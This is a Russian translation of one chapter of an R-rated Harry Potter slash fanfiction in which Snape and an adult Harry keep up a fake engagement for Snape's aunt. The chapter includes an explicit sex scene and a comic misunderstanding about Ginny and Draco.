Mistletoe (Омела)

Автор: Forever then some
Перевод: Kirrsten
Бета: Laconic
Пейринг: ГП/СС
Категория: Слэш
Рейтинг: R
Жанр: Humor/Romance
Статус         закончен.
Disclaimer:  Эта история написана только для развлечения, а ни как не для получения прибыли.
Разрешение на перевод:  получено.
Оригинал: здесь

Глава 6

Пару часов спустя Северус, расположившийся в гостиной-кабинете-библиотеке, услышал, как дедушкины часы у входной двери пробили три. Он устало сидел на стуле возле тлеющего умирающими угольками камина и невидящим взглядом сверлил лежащий на коленях толстый французский справочник по Зельям. Собственные думы настолько поглотили его, что шаги  спускающейся по лестнице Клары он услышал только тогда, когда она оказалась рядом с ним. Северус ничем не выдал, что заметил её присутствие, хотя по звуку трости на покрытом коврами полу понял, что она подошла ближе.

– Несколько поздновато для размышлений, не считаешь?

– Я не размышляю. Просто не смог заснуть и спустился почитать что-нибудь. Я постоянно так делаю. Ничего странного.

– Значит,  простоЗначит, ты простоЗ читаешь книгу. Ничего особенного. 

– Именно.

– Хмм, тогда почему у тебя книга вверх ногами? – выдала кривую ухмылку Клара.

Тяжело вздохнув, Северус опустил глаза – с книгой все было в порядке:

– Она не вверх ногами!

Тонкие губы Клары скривились в самодовольной усмешке:

– Тебе пришлось посмотреть вниз, чтобы убедиться, правда?

Зарычав, Северус захлопнул книгу.

Женщина устроилась на соседнем стуле:

– Ты уложил Гарри спать?

– Когда я уходил, он уже отрубился. Просто труп. Но, во всяком случае, на этот раз он вел себя спокойно. 

– Может, объяснишь, почему ты сидишь здесь, когда он находится в кровати?

– Мне не спалось. Я не хотел ему мешать.

– Если хочешь знать мое мнения, это – просто чушь. Хотя, – проворчала она, – люди не интересуются моим мнением так часто, как должны.

– Возможно, потому, что это не твое дело, – решительно ответил Северус.

– Это – моё дело. Здесь что-то не так...

– Все нормально!

– Что-то не так.

– Совершенно ничег...

Клара стукнула его тростью:

– Говорю же, что-то не так. Если вы все же планируете пожениться, будет лучше, если мы разберемся с проблемой.

– Мы? Скажи, что не правильно?! Совершенно ничегоэто только мое дело и Гарри.

– И мое тоже. Хотелось бы убедиться, что у вас все в порядке, прежде чем я умру.

Северус резко вскинул голову:

– Перестань! Ты нас всех переживешь!

– Пффф, – усмехнулась Клара. – Я стара, Северус. Это не обреченность,  а констатация факта. ...Всем порядочным людям давно пора спать, – она поднялась и замерла перед Северусом: – Только подумай об одной вещи. Я очень проницательная женщина. И не делаю милых и романтических замечаний. Зато вижу многое из того, что не видят другие. И никогда не настаиваю на том, во что не верю сама.

– Это то, о чем я должен задуматься? 

– Нет, это лишь преамбула. Отнесись посерьезней к моим словам. Гарри предназначен для тебя. Ты абсолютный дурак, если позволишь себе упустить такой шанс. 

– Ты сама не понимаешь, о чем говоришь… 

Клара наклонилась и прижалась губами ко лбу Северуса – необычное для обоих выражение привязанности:

– Мне слишком о многом пришлось пожалеть в своей жизни. Доброй ночи, Северус, дорогой.

– Доброй ночи, тетя Клара. 

Спустя несколько минут после того, как тетя скрылась в комнате, Северус подошел к столу у окна и вытащил из ящика пергамент и перо. Если он не хочет, чтобы Гарри исчез из его жизни... придется кое-что предпринять. 

Тщательно свернутый пергамент лежал в кармане, когда некоторое время спустя он поднимался по лестнице. Гарри обнаружился там же, где его оставили  – распластанным на кровати. И сладко причмокивающим во сне.

Северус позволил себе пробежаться взглядом по изящным очертаниям фигуры спящего. Тонкая футболка,  обтягивающая тело, чуть задралась, боксеры немного сбились, обнажая загорелую кожу. Северус почувствовал, как реагирует собственное тело. Он не мог перестать думать о сексе!

Возможно, тетя права, и он должен получить Гарри. Если действительно хочет его.

Поттер завозился  и недовольно насупился, вздыхая и заворачиваясь в одеяло. Северус глаз не мог отвести. Он хочет его до безумия – кошмар!

Он любит Гарри... Не понимая, как так вышло, но, уверен, что это так. И он… доволен. Доволен, что контролирует  один из тех редких моментов, когда хочет не просто обладать молодым человеком.

Так странно для него оказаться влюбленным, но ничего не поделаешь. Ему нравится присутствие Гарри в доме, его запах и вкус.

И Северус понял, что все, о чем  он сейчас мечтает, – это постоянно видеть Гарри в своем доме.

И если это не любовь – он не был уверен, что знает точно, что такое любовь, – то и этого для него достаточно.

«А что относительно Джинни Уизли? – напомнил кто-то кисло в его голове. – Ты сможешь делить Гарри с кем-то еще? Овладеть им несколько раз, зная, что после этого  он вернется домой к своей fiance?»

Пусть так, Гарри влюблен в девочку, но может и разлюбить ее. Кроме того, если бы Гарри был полностью верен Джинни, он никогда не позволил бы случиться тому, что случилось с ними в переулке.

А в случае необходимости, Северус знает несколько способов заставить Джинни загадочно исчезнуть...

Он нуждается в Гарри: под ним, рядом с ним,  как часть него.

 

И он нуждается в нем прямо сейчас.

 

– Просыпайся!

Сквозь толстую завесу сна и остатков алкогольного тумана, Гарри очень неопределенно расслышал команду. И не отреагировал, пока тяжелая рука не опустилась на плечо. Рефлексивно он захватил руку и потянул на себя, другой рукой автоматически шаря под подушкой в поисках палочки.

Захваченный  врасплох этим движением, Северус отшатнулся, потерял опору на маленьком коврике  и шлепнулся на пол. А Гарри, который все еще держал его запястье, почувствовал, как его тянут с кровати, подобно огромному мешку  муки.  

 

Огромному  мешку муки с очень хорошей целью.

 

– Оу-ф! – воздух покинул легкие Северуса, когда локоть Гарри уперся ему в диафрагму, а колено опасно приблизилось к весьма чувствительной области между ног. Северус резко оттолкнул его, прижимая руку к животу: – Ох!

– С-снейп? – Гарри открыл затуманенные глаза и тяжело соскользнул на пол. – Какого черта?.. Как кровать оказалась на полу?

– Ты опять пьян? 

– Все ещё пьян, – поправил Гарри, постанывая. – Совершенно верно, я все ещё пьян. Сколько времени?

– Половина четвертого.

– Утра? – спросил явно перепуганный Гарри.

– Естественно, утра, тупица.

Молодой человек сел, тяжело привалившись к кровати:

– Почему я  не сплю?

Северус поднялся на ноги, поправляя одежду:

– Я тебя разбудил.

– Ммм, да, это все объясняет.

– О, заткнись, Поттер.

– Ты и  в самом деле разбудил меня посреди ночи, чтобы приказать заткнуться?  Даже ты не можешь быть так непоследователен...

– Непоследователен?

– Это означает быть... или?..

– Перестань умничать, тебе не идет.

– Ты меня оскорбляешь?

– Конечно же, нет. Это комплимент! – Гарри открыл рот, решив ответить достойно. – O, заткнись, мы должны поговорить.

Но Поттер был настроен скептически:

– О чем, Снейп? Я так устал. Это не может подождать до утра? Тогда я точно не сделаю ничего, о чем кто-нибудь из нас пожалеет.

– Нет, боюсь, я не могу подождать. Мы должны обсудить, как быть дальше. С нами… и с происходящим. 

Гарри  попробовал сохранить внешнее спокойствие:

– А что должно случиться?

– У меня кое-что есть для тебя. Точнее, я кое-что приготовил для тебя.

Гарри, чувствуя, как теплая волна беспокойства прокатывается внутри,  внимательно наблюдал, как Северус неловко достает из кармана помятый кусок пергамента. 

– Вот, – Северус помахал свитком перед его носом.

Гарри скосил глаза на бумагу, затем потянулся и схватил в руки. Опираясь на кровать, он развернул свиток. После чего в замешательстве нахмурился. Список каких-то дат... Он просмотрел его и  указал пергаментом в сторону Снейпа:

– Что это?

– Список дат.

– Это я понял, когда увидел перечень названий месяцев и чисел.

Северус возвел глаза к небу:

– Даты, когда твои услуги будут необходимы.

– Прости?.. Мои услуги? – Гарри прищурился, и в его глазах засверкали зеленые искры. 

Северус пожал плечами и сделал небрежный жест рукой:

– Дни, когда мне потребуется твое присутствие. Все для Клары, разумеется. В основном, дни главных праздников: день рождения Клары, мой день рождения…  должно хватить... возможно, ещё одно воскресенье… или два, но с этим определимся позднее, исходя из твоего графика.

Гарри издал громкий звук, напоминающий наполовину фырканье, наполовину смешок.

– Ты не серьезно. 

Северус выпрямился, всем своим видом показывая, что очень даже серьезно. 

Гарри резко выгнул бровь, позволяя собеседнику догадаться, что считает его ненормальным. 

– Что ты там выискиваешь? Я просто выбрал ближайшие к каждому празднику дни, чтобы ты смог еще провести настоящий праздник с Дж…  с тем, кем захочешь.

Гарри сердито потряс свитком:

– Ты действительно хочешь, чтобы я приезжал дюжину раз в год, дабы показаться на глаза твоей тете?

– Одиннадцать, – уточнил Северус, – плюс обед в одно–два воскресенья.

– Нет.

– Извини?..

– Нет. Не согласен. Я не хочу продолжать врать Кларе!

– Я компенсирую тебе все потраченное время.

– Я не шлюха, Снейп.

– Я и не говорил, что ты шлюха.

– Интересно, как ещё можно назвать того, кто за деньги делает то, что мы делали?

– Что мы сделали однажды, случайно. Очевидно, это никогда больше не повторится. Конечно, мы же не собираемся совершать дважды одну и ту же ошибку. Я хотел сказать… нас... мы… не будем… 

Гарри чувствовал, что каждое бессвязное слово Снейпа запутывает объяснения все больше, заставляя его чувствовать себя ошеломленным и глупым, потому что он не желал прекращать совершать ту же ошибку снова и снова, с тех самых пор, когда это случилось впервые.

– Неважно. Я согласен.

– Согласен? – резко переспросил Северус, глядя на Гарри как-то странно. 

– Конечно. Ты не мог бы сделать все более очевидным, даже отпечатав у меня на лбу. Все это и, правда, было ужасной ошибкой. – Гарри сделал долгую паузу и затем пожал плечами: – Я забыл об этом. 

Повисла тяжелая пауза.

– Какого черта…   

Времени подумать над сказанным не было: его опрокинули на кровать. Северус вдавил его в матрац и провел рукой по животу, затем по резинке боксеров:

– Ты забыл об этом?

Гарри слегка поерзал, даже не пытаясь отодвинуться на самом деле, но чувствуя себя немного некомфортно. И прекратил возиться, когда Северус до боли сжал его в объятиях. Выражение  его глаз могло напугать любого.

– Ты забыл о тех звуках, что издавал, в то время как терся об меня, когда твое тело дрожало,  и ты кончил в штаны? – мужчина заглянул в блестящие зеленые глаза, и прижался к Гарри бедрами: – Ну? Это освежило твою память? 

– Да-а-а...

– Значит, все-таки не забыл?

– Нет, – голос Гарри дрогнул, когда пальцы Северуса прошлись по его груди,  слегка царапая кожу и пощипывая соски.

– Ты хочешь этого снова, Поттер?

Выдержав короткую паузу и с хрипом втянув воздух, Гарри помотал головой.

– Нет? – не поверил Снейп. Он чувствовать ложь – член Гарри пульсировал под его ладонью сквозь тонкий хлопок боксеров. – Ты хочешь сделать это снова?

– Ты тогда… в первый раз ты ничего не получил, – Гарри задыхаясь,  выгнулся на кровати.

– Хочешь все изменить?

Горло Гарри перехватило, и способность формулировать мысли испарилась. Он порывисто закивал и медленно провел руками вниз по телу Северуса, почти ожидая, что мужчина окажется таким же холодным, как и его поведение. Но тело под его руками горело. Мягкое удовлетворенное шипение сорвалось с губ молодого человека, и он почувствовал, как от этого звука задрожал зельевар.

Снейп распахнул халат, оставаясь в теплых шерстяных брюках и рубашке. Гарри пришлось собрать все свое самообладание, чтобы рука не дрожала, когда он потянулся и расстегнул молнию на брюках Северуса; последняя вещь, которую он хотел, чтоб тот увидел – как он трясется, словно лист на ветру.

Расправившись с молнией, Гарри подтолкнул Северуса, прислоняя к перегородке, и устроился у него между бедер.

Золотой Мальчик в такой позе весьма устраивал Снейпа. На коленях. Что придало ему уверенности и смелости.

– Чего ты ждешь, Поттер?

Тяжело дыша, Гарри прикусил нижнюю губу. Северус наблюдал, как тот освобождает его от брюк и нижнего белья, затем позволил взять ему небольшую паузу.

Он подарил ему несколько долгих мгновений, а, возможно, всего лишь секунду, которая показалась несколькими долгими мгновеньями, и поторопил:

– Продолжай!

– Продолжать что? – потребовал Гарри, заливаясь краской замешательства, или волнения, или восхитительной комбинацией и того и другого – Северус точно не знал.

Идиот действительно собирался заставить его обстоятельно пояснять процесс? Хммм.… А может, великолепному маленькому герою нравится  слышать это? Чудеса все ещё бывают?

– Дотронься до меня, – потребовал Северус. – Возьми его в руку.

Гарри подчинился, медленно выполняя приказ. Он мог видеть и чувствовать, как член Северуса дрогнул, и сжал его крепче.

Теплое, дразнящее дыхание коснулось кожи Северуса. Он пропустил длинные пальцы через непослушные темные волосы Гарри:

– Двигайся.

– Скажи мне. Скажи. Пожалуйста, – шептал Гарри.

– Возьми его в рот. Оближи его, Гарри.

Почувствовав успокаивающее давление руки Северуса, Гарри наклонился и заскользил языком по члену. Северус издал слабый, неопределенный звук, напоминающий хныканье. Гарри явно было недостаточно такой малости – и он почти полностью вобрал возбужденную плоть. Длинные пальцы  вцепились ему в волосы, и он ещё шире открыл рот, желая доказать свое нетерпение и силу желания. 

Из-под двери блеснула полоска света, и в коридоре что-то грохнуло.

Гарри испуганно вздрогнул и отшатнулся.

– Проклятыеебаныезубыпоттера! – заорал Северус. 

– Прости, – зашипел Гарри, вскакивая на ноги.

Северус только стонал от боли.

– Мальчики? – позвал голос. – Мне показалось, я что-то услышала. Все хорошо? Ещё очень рано.

– Все прекрасно! – откликнулся Гарри с отчаянием.

– В самом деле? – произнесла Клара, голосом, полным понимания – слишком большого понимания! – чтобы Гарри почувствовал себя комфортно. Но свет погас, закрылась и дверь, ведущая в холл.  Гарри вернулся к корчащемуся на кровати Снейпу и той его части, которая, всего несколько мгновений назад, с видом победителя торчала вверх, а теперь быстренько сжалась.

Гарри обеспокоено посмотрел на лежащего:

– Ты в порядке? 

– Ты меня укусил! 

– Я не хотел кусать. 

– Название для своего поступка придумаешь позже. Факт в том, что я чувствовал твои зубы там, где определенно чувствовать был не должен. 

– Это был несчастный случай, твоя тетя напугала меня. Я больше не буду.

Северус натянул одеяло:

– Просто возвращайся в кровать, Поттер.

– Подожди. Мы могли бы…

– Nox.

На следующее утро, когда Северус проснулся, Гарри в комнате уже не было. Нелепо, но этот факт его разозлил. Во-первых, Поттер сумел встать и одеться, не разбудив его. И, во-вторых, он ждал, что Гарри накинется на него с удушающими объятиями, и собирался насладиться каждой секундой.

Он забеспокоился и через десять минут уже был внизу. Так, в гостиной темно, но из-под кухонной двери виднеется свет. Когда он открывал дверь, то сам точно не знал, что хочет увидеть, но только не Гарри, по локоть в тесте и в облаке муки, лепящим маленькие шарики.  

– Что во имя Мерлина ты делаешь?

– Пеку печенье. – Гарри многозначительно посмотрел на него: – Э... Как твой?..

– Отлично. Мы это обсуждать не будем. Почему ты печешь печенье?

Гарри пожал плечами, отвечая таким же отстраненным тоном:

– Потому что сегодня Сочельник. Что означает, завтра – Рождество. А у тебя сахарного печенья нет. Не может быть Рождества без  печенья.

Северус прищурился:

– Ты же снова не употреблял напиток из взбитых яиц, нет?

– Лучше помоги мне. 

Северус скривился от отвращения:

– Мне все ещё непонятно, с какой стати ты этим занимаешься. Тебя же здесь на Рождество не будет. То есть, ты же идешь на Рождество к Уизли. Уверен, что у Молли все просто завалено печеньем.

– А я?..

– Что ты?.. 

– Отправляюсь на праздник к Уизли? Я мог бы остаться здесь. С тобой и Кларой. Если хочешь...

– Договор не включает Рождество.

– Я знаю, Северус. Я просто подумал… К тому же, разве Клара ничего не заподозрит, если я не останусь на праздник?

– Придумаю что-нибудь подходящее. Все эти годы научили меня прекрасно находить отговорки.

– Знаю, – просто и мягко произнес Гарри.

– Ты подумал о моем предложении?

– Твое предложение? Список дат? – Снейп кивнул. Гарри покачал головой: – Я не согласен, и имею в виду именно это. Моя роль в комедии заканчивается сегодня вечером.

– Я считал, что раз у тебя было время подумать… 

– Нет. Я не буду делать этого. Не хочу.

Чувствуя болезненное разочарование, Северус быстро сменил тему:

– Ты выглядишь смешно.

– Что? 

Северус указал на него:

– Это. Ты. Пекущий печенье. Тети нет рядом, и можно пользоваться магией.

– Не думаю.

– Весь пол в муке.

– Ну и что? Отмоется. 

– Она везде.

– Я вымою.

– Надеюсь.

Гарри обогнул стол  и  подошел к Северусу, протянув к нему запорошенные мукой руки:

– Тебе обязательно нужно меня раздражать? – Северус ждал протеста. Или извинения. Он не дождался ничего.

– Да. Наверное, моя цель действительно позлить тебя, – Гарри подошел вплотную, не сводя пристального и вызывающего взгляда. – Сработало?

– Ты же знаешь, что да. 

Гарри улыбнулся, измазанные мукой уголки губ приподнялись. Тело Северуса с готовностью отозвалось.

Смешно, как он реагирует на улыбки Золотого мальчика. И реакция становится все более последовательной. Неприятно.

Гарри доставляет все больше неприятностей.

Неприятность, с маленьким пятнышком муки на нижней губе. Розовая, облизываемая нижняя губа. Все, что ему хотелось сейчас:

– Я собираюсь тебя поцеловать.

Челюсть Гарри дернулась:

– Спасибо за предупреждение.

Северус протянул руку и большим пальцем скользнул по губе Гарри, стряхивая муку. Когда он поцеловал его впервые, ему хотелось попробовать на вкус Гарри, и только Гарри. Он пытался  избавиться от этих мыслей – ведь он взрослый человек. Ему не полагается думать о таких пустяках...

Он так сосредоточился на губах молодого человека,  что не заметил, как взгляд зеленых глаз метнулся влево, и очнулся только тогда, когда Гарри высвободился и вскрикнул:

– Джинни! 

Северус разозлился:

– Я понимаю, что у тебя связь с девчонкой Уизли, но лично я не желаю слышать, как её имя срывается с твоих губ.

– Джинни... подожди, связь? Спятил? Нет, не отвечай. Джинни – снаружи.

– Снаружи?

Гарри указал на окно, к стеклу которого припечаталась младшая Уизли в окружении ещё нескольких лиц.

– Проклятье, Поттер, какого… они делают здесь?

– Я их не звал, – защищаясь, завопил  Гарри.

– Избавься от них. Быстро. – Гарри даже не стал спорить с приказом и подскочил к двери, вытирая руки о штаны.

Дверь открылась, и он столкнулся с тремя самодовольно улыбающимися рожами и одним немного виноватым взглядом.

Для начала обратился к виноватому:

– Джинни, о чем ты думала?

– Да ладно, Гарри. Это настолько… я просто не могла сохранить все в тайне.  

Гарри кивнул в сторону Гермионы и Рона, затем, более зловеще, Драко:

– Но притащить их сюда? 

– Давай, Поттер. Ты женишься на моем крестном,  что сделает нас семьей, – белокурая голова качнулась, и руки раскрылись для объятия: – Крестный папенька!

Он заработал тычок в живот от Джинни:

– Ты сказал, что будешь контролировать себя.

– Успокойся, рыженькая, Поттер может забирать его себе. 

– Не хочешь ли ты?.. – Гермионе так и не удалось закончить предложение, так как тяжелый пинок убрал Гарри с дороги в сторону:

– Что тут у нас?

Гарри судорожно сглотнул и выдавил:

– Только лишь несколько моих друзей. Вы помните Джинни Уизли?

– Не остужайте дом. Войдите и закройте дверь.

– Уммм… не думаю, что у них есть время остаться, они заглянули сюда по пути…

– Чепуха, – перебил Драко, встревая с истинно малфоевским обаянием: – Мы найдем время для коротко визита. Подвинься, Поттер. Мы не хотим охлаждать дом.

Гарри неохотно посторонился, пропуская друзей. Из дальнего угла кухни Северус увлеченно наблюдал за происходящим. Или только за Джинни? Пусть так, в конце концов, именно Джинни все всем растрепала.

– Северус, Гарри, сделайте немного чая. Я иду в комнату. Джиневра, присоединяйтесь ко мне.

Вымученная улыбка показалась на лице Джинни:

– Я бы осталась тут… Если она продолжит называть меня Джиневра, – бормотала она уже у двери в гостиную, закрывшуюся за тетей Северуса.

– Не знаю, Джинни, неплохое имя, – фыркнул Рон удивленно.

– Ну да, прекрасное – для тебя, вот подожди немного, когда она начнет называть тебя Рональдом... 

– Возможно, я лучше останусь тут, с Гарри... 

– О, нет. Не останешься. Ты идешь со мной. 

– Нет, Джин.

– Джиневра. Хватит бездельничать. Иди сюда, – властно пророкотала из комнаты Клара.

Джинни вздрогнула и схватила Рона за руку:

– Не  оставляй меня с этой женщиной наедине.   

Рон нахмурился:

– Что такого?..

– Если пойдешь со мной, я дам тебе пять галеонов.

– Не будь дурочкой, Джинни.

– Двадцать. 

– Идет! 

Джинни шагнула в комнату, потянув Рона за собой.

Она осторожно приблизилась к Кларе, брат наступал ей на пятки.

– Миссис Снейп? 

Мисс Снейп,  дорогуша, – подчеркнула Клара. – Никогда не видела  разумной причины выйти замуж в молодости, а постарев, слишком привыкла быть одна.

Мисс Снейп, рада видеть Вас снова. 

– Никто мне особо не радуется, за исключением, пожалуй, Северуса, но и он, уверена, не больше половины времени. Все равно, ваша ложь выдает хорошее воспитание. Надо сказать, я ещё не знакома с вашим спутником, но, должно быть, ваш родственник. Те же кошмарные рыжие волосы.

– Мисс Снейп, мой брат, Рональд Уизли.  Рональд – тетя Северуса, мисс Снейп. Рональд – лучший друг Гарри.

Рон стрельнул глазами в сестру. После чего с вежливой улыбкой повернулся к Кларе:

– Приятно познакомиться. Собственно, я – Рон. Просто Рон.  

Она посмотрела на него как на пустое место, затем прищурилась.

Прищурилась сильнее.

И ещё сильнее.

– Понятно. Рональд... – пропела Клара. – Так, и сколько она предложила тебе, чтобы ты пошел с ней?

– Умм… она не… о… 

Джинни усмехнулась:

– Признавайся. Ты уже помог. 

– 20 га… фунтов, – сознался Рон.

Клара  с негодованием фыркнула:

– Глупец. Надо было торговаться до тридцати. 

 

Кухня.

 

Драко прошествовал мимо Снейпа, оперся бедром на угол стола и, запихнув руки в карманы, небрежно кивнул:

– Северус. 

Хорошее настроение Снейпа покинуло. Он был совершенно раздавлен. Ему практически удалось поцеловать Гарри, когда эти невыносимые Уизли вломились через черный ход! Конечно, Гарри не захочет целовать его теперь, когда тут эта маленькая, изящная, словно эльф, девчонка Уизли. Окинув крестника враждебным взглядом, он весь свой яд вложил в приветствие:

– Драко.

– Наверное, мне лучше присоединиться  ко всем в комнате.

– Возможно, стоило бы.

Драко вынул руки из карманов и сбежал.

В полном молчании Северус поставил чай, развернулся и исчез в гостиной. 

Гермиона осталась помогать Гарри расставлять на подносе чай и  блюдца, сливочник и сахар. Она продолжала кидать на него косые взгляды, сводя этим с ума, пока, наконец, он не швырнул ложки на поднос и не потребовал:

– Просто скажи, Герм.

– Что сказать?

– Все, что ты об этом думаешь.

– Ты собираешься в Нору на Рождество?

– Да. Наверное... Возможно. Все так сложно.

 – Так не усложняй.

– Трудно.

– Почему нет?

– Это нелегко для меня. Снейп… он… не уверен, как он относится к тому, что я здесь. Он, точно, не самый легкий человек для совместного проживания.

– Я не буду осуждать, если тебя не будет на Рождество с нами. Уизли не твоя семья.  

– Гермиона! – заорал Гарри. – Как ты можешь?

– Я не говорю, что это плохо, Гарри. Я люблю тебя. Рон, любит тебя. Ремус,  Молли, Артур, список может расти и расти. Мы все тебя любим. Мы всегда будем семьей. Но, Северус может стать  твоей семьей.

В этот момент на кухню вернулись Джинни и Драко:

– Клара интересуется, почему так долго нет чая. А Рон скоро начнет рыдать, если один из вас не появится в комнате и не спасет его от Снейпов.  

– А вы куда? – осведомилась Гермиона.

– За дровами для камина, – буркнула Джинни. – Я предложила наколоть побольше. 

– А я помочь ей.

Гарри недоверчиво посмотрел на блондина:

– Ты знаешь, как это делается?

– С какой стати я должен знать, когда у меня есть ПАЛОЧКА? – В ответ Драко получил странный взгляд. И поторопился объяснить: – Я не говорил  о МАГИИ в одной комнате с МАГГЛОЙ.

Гермиона похлопала его по руке:

– Клара – маггла, но не дура, ты, идиот. 

Драко оскорблено посмотрел на Джинни:

– Ты позволишь ей меня обзывать подобным образом?

– Идиота ты заслужил. – Джинни подхватила его под руку: – Пойдем, дорогой.

Чайник засвистел одновременно с появлением Хедвиг, нетерпеливо бьющейся в дверь. Гарри указал на чай:

– Отнеси в комнату, ладно, Герм? Я посмотрю почту.

Балансируя стоящим на подносе чаем, Гермиона двинулась в комнату. Гарри вздохнул, поднял валяющийся у двери пиджак Рона и вышел за дверь забрать почту и успокоить Хедвиг прежде, чем она начнет орать достаточно громко, чтобы услышали в доме.

Джинни и Драко играли в снежки и хихикали, словно школьники. Гарри подумал, что в следующий раз стоит припомнить Малфою об этом, но пока не испытывал никакого желания наблюдать их игру, так что завернулся в пиджак  Рона и двинулся  вокруг дома.

Северус посмотрел на часы. В очередной раз. Прошло десять минут, но ни Гарри, ни Джинни не вернулись. Драко тоже не было, но он Северуса не очень волновал.  А вот Гарри и его маленькая подружка, как раз наоборот. Конечно, Гарри не настолько глуп, чтобы  делать с ней что-нибудь здесь. Только не тогда, когда всего несколько часов назад он дрожал у него между ног.

– Северус Снейп!

– Что?

– Обрати на меня внимание, когда я говорю с тобой.

– Обращаю.

– Пффф. Ты витаешь в облаках. Не похоже на тебя.

Северус поднялся:

– Мне нужно выйти, на минуту.  

– Куда?

– Я скоро. И я не ребенок, чтобы отчитываться за каждый шаг.

– Но твои гости только что пришли, – спокойно заметила старуха, указывая на Рона и Гермиону.

Северус немедленно уставился на неё. В её заявлении не хватало обычного для их семьи обвинения.

Что означало – она что-то задумала.

– Хорошо, я остаюсь, – решил испытать её Северус.

– Мы не против, можешь покинуть нас ненадолго. 

Хммм, определенно, что-то задумала. Если тетя когда-либо и произносит хоть что-то по поводу его необходимости быть не с ней, то только: «Слишком занят для  единственной тетки»? Северус едва не соблазнился остаться, заявив: «Я остаюсь!» – и сорвать ее планы. Но не сейчас, когда хотелось сбежать и найти Гарри и Джинни.

Он оставил Рона и Гермиону с тетей и зашагал через кухню к черному ходу. Следы обуви Джинни вперемешку со следами тяжелых ботинок военного образца он увидел на снегу сразу, как только открыл дверь. На мгновение желудок сжался, и пальцы крепче вцепились в палочку, а мозг уже подбирал заклинания, которые разделят их. Как Гарри мог даже подумать?..

Но следы принадлежали не Гарри, как и ноги, одетые не в джинсы Гарри. Снейп повернулся, чтобы убедиться, что не Гарри прижимает Джинни к снегу. Её руки скользили по отвратительным белокурым волосам… Малфоя. Волосы Драко. Его крестника. Личной школьной Немезиды Гарри.

 

Грязная маленькая тайна Джинни Уизли.

 

Когда Гарри вернулся в гостиную, все уже были на месте. Цветущие Джинни и Драко сидели в противоположных концах комнаты и стреляли  друг в друга глазками. Гермиона и Клара, казалось, ничего не замечая, горячо спорили о месте женщины в британской политике. Северус о чем-то думал в углу – ничего удивительного. Рон одиноко сидел у камина.

Гарри подошел к лучшему другу, и они уже вдвоем принялись рассматривать комнату.

Молчание было просто гнетущим, пока Рон не ляпнул веселым голосом:

– Итак, ты и в правду помолвлен со Снейпом. Ну и как тебе?

Почти два часа спустя, Гарри, сложив чашки в раковину, громко вздохнул:

 – Вот и все. 

Северус что-то согласно пробормотал, включая воду.

Гарри улыбнулся:

– Мы… э… снова одни. 

– Тетя все еще в комнате.

– Ты прав, – тон Гарри выдал разочарование, но понятно, что Северус хочет держаться в стороне, когда Клара поблизости. 

– Гарри, я должен кое-что рассказать тебе.

– Что? – когда Снейп не ответил, он повторил: – Что, Северус? 

Джинни обманывает  тебя, она встречается с  Драко Малфоем. Я видел их вместе. Играющими в снегу.

О, Мерлин. Она? Спасибо, что рассказал! Знаешь, я не убит этим. То есть, прошедшие  несколько дней  открыли мне глаза на лучшую возможность. Я понял,  что вообще никогда не  любил Джинни. Я люблю тебя, Северус. И хочу тебя, Северус.

Это довольно неожиданно, Гарри.

Конечно. И я решил не уезжать после Рождества.  Останусь с тобой. Да, я решил  угробить свою жизнь и репутацию, чтобы остаться с тобой, а не с Джинни Уизли.

Гарри помахал у него перед носом рукой и внимательно посмотрел в глаза:

– Северус? Ты хотел сказать что-то?

Зельевар сжал губы и нахмурился:

– Да, я видел кое-что, когда ты исчез этим  утром. Кое-что, что может причинить тебе боль.

Гарри беспокойно сдвинул брови:

– Что?

На этот раз представленная Северусом картина была более реалистична. 

Джинни  обманывает тебя, встречаясь с Драко Малфоем. Я видел их в снегу этим утром.

Лжец! Она  не такая! Джинни любит меня, и я люблю ее! Ты, испорченный  ублюдок, как ты мог выдумать такое? Чего ты ожидаешь? Что я поверю  и откажусь от перспективного будущего ради тебя? Мерлинова борода! Ты  глупец!

– Ну? Ты собираешься рассказывать? 

– Я видел… 

Джинни, обманывает тебя. Она была с Драко Малфоем  в снегу этим утром.

Нет ответа. Только боль от предательства в лучистых зеленых глазах.

Северус прокашлялся:

– Я видел Драко, во дворе.

– Хммм…

– И мисс Уизли.

– Хммм…

– Джинни Уизли.

Гарри все еще не реагировал.

– Драко и Джинни, они… были вместе.

– Так ты говоришь… 

– Мерлин! Тебе не понятно? Они были вместе, как пара.

На сей раз, нос Гарри сморщился:

– Отвратительно, правда?

– Постой. Ты знал?.. О них?

– Уже несколько месяцев. Или полгода, – Гарри умолк и с любопытством посмотрел на него. – А Драко никогда не рассказывал тебе?

Северус не обратил внимания на вопрос:

– Ты знал? И допустил это?

Гарри пожал плечами:

– А что я могу поделать, это не мое дело.

– Не твое? – не веря, переспросил Снейп. – Не твое? Ты ее друг!

– Да, – усмехнулся Гарри, спокойно глядя на Снейпа. – Подожди, ты серьезно?

– Я очень редко несерьезен.

Гарри сжал челюсти, и Северус почти физически почувствовал, как тот приходит в ярость:

– ТЫ – ЗАДНИЦА!

– Что?!

– Ты думал, что я обручен с Джинни Уизли?!! – лицо Гарри пылало.

– А что ещё я мог подумать, о вас писали все газеты! И ты сам говорил мне… 

– Я говорил, что женюсь на Джинни? – завопил Гарри.

– Да! Хорошо, не такими словами, но говорил.

– Что это значит? 

– Я видел вас двоих, тогда, за домом. Совсем недавно.

Гарри прошипел, яростно сверкая глазами:

– Ты шпионил за нами?

– Нет, я просто нечаянно подслушал часть вашей беседы.

Этот ответ Гарри не успокоил:

– Ты шпионил за нами?

Северус ощетинился:

– Ты сказал, что любишь её. 

– Разумеется, я люблю ее, – закричал  Гарри нетерпеливо. – Я знаю её с десяти лет! Она младшая сестра Рона. И она – необыкновенная женщина, которая не раз рисковала жизнью ради меня и семьи. Она умна, мила, забавна. Почему я не должен её любить?

– Отлично. Надеюсь, ты, Уизли и Драко очень счастливы вместе!

Гарри зверски захотелось воспользоваться палочкой. Северус раздражен нахмурился:

– Даже не думай. 

– Очень соблазнительно. 

– Поттер, тетя в соседней комнате.

– Только это и спасет тебя.

– Не понимаю, что тебя так разозлило, Поттер. Посыльных не убивают. Злись на Уизли.

– Я не злюсь на неё.

Северус помертвел:

– Почему? Почему нет?

– Она вольна встречаться с кем хочет.

– Чудные, здоровые отношения у вас там! 

– Джинни Уизли может встречаться  с кем угодно, потому что она не моя подружка, не моя  fiance. МЫ НЕ СВЯЗАНЫ НИКАКИМИ ОТНОШЕНИЯМИ.

– Ты... серьезно?

Гарри зарычал. Зарычал:

Ты безнадежен. Самый упрямый человек по эту сторону Атлантики.

– Только по эту?..

– Я никогда не был по другую, так что не могу гарантировать. – Северус фыркнул. – Ты такого низкого обо мне мнения?

Снейп беспомощно мигнул:

– Что? 

